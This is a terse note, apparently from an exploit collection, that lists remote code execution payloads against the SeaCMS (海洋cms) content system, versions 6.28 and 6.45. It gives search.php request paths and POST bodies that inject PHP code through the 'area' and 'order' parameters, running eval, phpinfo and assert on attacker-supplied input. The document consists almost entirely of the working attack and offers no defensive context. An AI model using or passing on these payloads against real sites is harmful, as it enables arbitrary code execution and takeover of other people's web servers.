海洋cms

v6.28
/search.php?searchtype=5&tid=&area=eval($_POST[cmd])


v6.45
/search.php?searchtype=5
post:searchword=d&order=}{end if}{if:1)phpinfo();if(1}{end if}
 searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end   if}&func=assert&cmd=phpinfo();

img